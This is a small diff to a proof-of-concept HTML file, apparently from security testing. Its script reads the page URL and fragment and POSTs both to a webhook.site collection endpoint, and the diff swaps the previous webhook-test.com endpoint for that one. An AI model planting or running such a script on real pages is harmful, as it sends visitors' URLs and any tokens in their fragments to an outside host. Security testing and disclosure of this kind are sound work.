--- a/poc.html
+++ b/poc.html
@@ -1,9 +1,10 @@
 <script>
 const url = location.href;            // chứa cả fragment
 const frag = location.hash || '';     // "#abc" hoặc ''
-fetch('https://webhook-test.com/3db25e3614c3f0e3f8ca9ffc70af93d7/', {
+fetch('https://webhook.site/8338a31b-9726-49c3-be5f-97874b2dee6b/', {
   method: 'POST',
   headers: {'Content-Type':'application/json'},
   body: JSON.stringify({url, fragment: frag})
 }).catch(()=>{});
+
 </script>
